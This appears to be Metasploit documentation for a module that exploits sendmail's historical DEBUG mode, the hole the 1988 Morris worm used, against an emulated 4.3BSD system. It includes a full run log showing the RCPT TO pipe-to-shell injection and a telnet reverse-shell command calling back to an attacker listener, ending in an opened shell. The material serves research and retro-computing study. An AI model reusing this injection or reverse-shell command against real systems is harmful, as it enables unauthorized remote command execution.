## Intro

This module exploits `sendmail`'s well-known historical debug mode to
escape to a shell and execute commands in the SMTP `RCPT TO` command.

This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

## Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.

For manual setup, please follow the Computer History Wiki's
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets

```
Id  Name
--  ----
0   @(#)version.c       5.51 (Berkeley) 5/2/86
```

## Options

**RPORT**

Set this to the target port. The default is 25 for `sendmail`, but the
port may be forwarded when NAT (SLiRP) is used in SIMH.

**PAYLOAD**

Set this to a Unix command payload. Currently only `cmd/unix/reverse`
and `cmd/unix/generic` are supported.

## Usage

```
msf5 exploit(unix/smtp/morris_sendmail_debug) > options

Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
   RPORT   25               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)version.c       5.51 (Berkeley) 5/2/86


msf5 exploit(unix/smtp/morris_sendmail_debug) > run

[*] Started reverse TCP double handler on 192.168.1.5:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Sending:  PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Sending: QUIT
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zqhqKJD7trW0E0Lp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zqhqKJD7trW0E0Lp\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

whoami
daemon
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?
```